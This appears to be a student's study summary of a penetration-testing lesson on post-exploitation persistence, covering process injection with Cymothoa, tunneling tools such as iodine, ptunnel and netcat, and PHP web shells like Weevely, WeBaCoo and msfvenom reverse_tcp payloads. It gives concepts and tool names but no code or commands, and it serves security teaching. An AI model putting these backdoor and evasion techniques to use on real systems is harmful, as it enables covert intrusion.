Week 10 & 11

#cybersecurity #infosec #security #learning

Maintaining Access: Post-Exploitation Foundations (Session 10 Summary)

This summary covers the primary theoretical concepts and definitions from Session 10 on Maintaining Access within a structured security assessment infrastructure.

1. Why Maintain Access?

Once initial access to a target network is achieved, establishing a persistent foothold is evaluated for several key reasons:

Efficiency: Avoids needing to repeat the initial exploitation phase ("reinventing the wheel").
Configuration Resilience: Ensures continuity if the original entry vector or vulnerability is patched or fixed by administrators.
System Hardening Adjustments: Allows analysts to continue testing even if basic perimeter firewalls or filters are updated.
Operational Considerations: Saves significant resource time during prolonged penetration testing engagements while always remaining within legal and ethical boundaries.

2. Core Persistence Frameworks

Security testing architectures classify persistence mechanisms into three primary methods: OS Backdoors, Protocol Tunneling, and Web-Based Backdoors.

A. Operating System (OS) Backdoors

An OS backdoor provides a method to access a host environment while completely bypassing standard authentication pathways to remain undetected.

Process Injection (Cymothoa): A utility designed to inject shellcode directly into the memory space of an existing, legitimate running system process (such as a system daemon). By attaching to a running Process ID (PID), the backdoor execution inherits the privilege context of that application securely without spawning a highly visible standalone process.
Advanced Frameworks: Platforms like Meterpreter or Intersect are applied to automate the management of local environment persistence.

B. Protocol Tunneling

Tunneling refers to the practice of encapsulating one network protocol inside another network protocol to safely navigate past perimeter defenses.

Purpose: Its main objective is to bypass protocol-specific restrictions or egress rules established on the target network.
Common Transport Channels: Highly trusted, standard outbound channels are favored to mask traffic, including DNS, HTTP/HTTPS, and SSH.
Common Tunneling Tools: * dns2tcp and iodine (encapsulating raw data traffic inside standard DNS queries).
- ptunnel (ICMP packet tunneling).
- proxychains, socat, stunnel4, and netcat.

C. Web-Based Backdoors

When the target infrastructure hosts web-based applications, testers can plant web shells as normal standalone scripts or inject minor payload logic directly into pre-existing source files (like themes or modules).

WeBaCoo (Web Backdoor Cookie): A stealthy web backdoor tool that uses the HTTP Cookie header to obfuscate command-and-control communication parameters, executing them via native PHP execution functions (system, shell_exec, exec, passthru, or popen).
Weevely: A tiny, highly optimized PHP web shell that acts as a stealthy terminal simulation tool, enabling filesystem browsing and remote command execution over standard web traffic vectors.
PHP Meterpreter: A payload module generated via msfvenom (reverse_tcp) that links web application code directly back to a waiting handler interface in Metasploit, opening interactive post-exploitation sessions inside the web daemon runtime environment.